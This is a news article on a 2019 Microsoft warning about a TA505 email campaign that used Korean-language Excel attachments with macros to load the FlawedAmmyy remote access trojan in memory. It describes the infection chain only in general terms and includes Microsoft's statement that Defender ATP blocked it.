“The XLS file, when clicked, installs the FlawedAmmyy malware, known for targeting businesses in finances and retail, on the computer”
Microsoft has warned users about a new malware attack disguised as an Excel attachment, targeted at Windows PCs. The Microsoft security team claims the XLS attachment contains a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory, that uses macro functions to attack Windows PCs. According to Proofpoint, the malicious campaign is started by a group called TA505 and the FlawedAmmyy is infamously known for targeting businesses in finances and retail.
Anomaly detection helped us uncover a new campaign that employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory. The attack starts with an email and .xls attachment with content in the Korean language. pic.twitter.com/PQ2g7rvDQm— Microsoft Security Intelligence (@MsftSecIntel) June 21, 2019
Furthermore, the group frequently uses Microsoft attachments and social engineering to compromise victims’ systems. The attack starts with an email containing an excel attachment which, when opened automatically runs a macro function that runs msiexec.exe, which downloads an MSI archive. “This MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory,” Microsoft notes. Since it would run in memory, it doesn’t get detected by an antivirus that only scans files on disk.
A file called wsus.exe is then downloaded and executed; it’s also designed to bypass the official Microsoft Windows Service Update Service (WSUS). It was digitally signed on June 19th and decrypted the payload in RAM, delivering the FlawedAmmyy payload. Since the excel attachment is in Korean script, it could be meant for Korean Windows users. Microsoft claims that “Microsoft Threat Protection defends customers from this attack.” The Defender ATP’s machine-learning systems “blocked all the components of this attack at first sight, including the FlawedAmmyy RAT payload.”